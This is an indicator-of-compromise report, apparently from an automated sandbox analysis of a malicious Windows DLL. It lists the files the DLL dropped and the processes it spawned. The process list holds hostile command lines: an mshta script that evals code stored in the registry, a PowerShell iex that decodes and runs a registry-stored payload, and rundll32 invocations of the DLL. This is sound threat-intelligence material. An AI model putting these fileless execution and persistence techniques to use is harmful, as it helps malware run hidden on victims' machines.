IOC Report


Files

File Path | Type | Category | Malicious
2u2mgtylJy.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | initial sample | malicious
C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified | clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.out | ASCII text, with CRLF, CR line terminators | modified | clean
C:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\RES1839.tmp | data | dropped | clean
C:\Users\user\AppData\Local\Temp\RES889.tmp | data | dropped | clean
C:\Users\user\AppData\Local\Temp\RESD66D.tmp | data | dropped | clean
C:\Users\user\AppData\Local\Temp\RESE022.tmp | data | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dbrdif.tbr.ps1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebhtree3.nqf.psm1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mz1hzvcs.52m.ps1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ow5jbajq.osu.psm1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\jdlmh2q4.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean
C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\jdlmh2q4.out | ASCII text, with CRLF, CR line terminators | modified | clean
C:\Users\user\AppData\Local\Temp\w34iw342.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean
C:\Users\user\AppData\Local\Temp\w34iw342.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\w34iw342.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\w34iw342.out | ASCII text, with CRLF, CR line terminators | modified | clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.out | ASCII text, with CRLF, CR line terminators | modified | clean
C:\Users\user\Documents\20211006\PowerShell_transcript.965969.PeztN8su.20211006233727.txt | UTF-8 Unicode (with BOM) text, with CRLF line terminators | dropped | clean
C:\Users\user\Documents\20211006\PowerShell_transcript.965969.n1aVGIxX.20211006233737.txt | UTF-8 Unicode (with BOM) text, with CRLF line terminators | dropped | clean
(22 additional files not shown.)

Processes

Path | Cmdline | Malicious
C:\Windows\System32\loaddll32.exe | loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll' | malicious
C:\Windows\SysWOW64\cmd.exe | cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 | malicious
C:\Windows\SysWOW64\rundll32.exe | rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin | malicious
C:\Windows\SysWOW64\rundll32.exe | rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 | malicious
C:\Windows\SysWOW64\rundll32.exe | rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father | malicious
C:\Windows\SysWOW64\rundll32.exe | rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign | malicious
C:\Windows\System32\mshta.exe | 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) | malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' | malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' | malicious
C:\Windows\System32\mshta.exe | 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) | malicious
C:\Windows\explorer.exe | C:\Windows\Explorer.EXE | malicious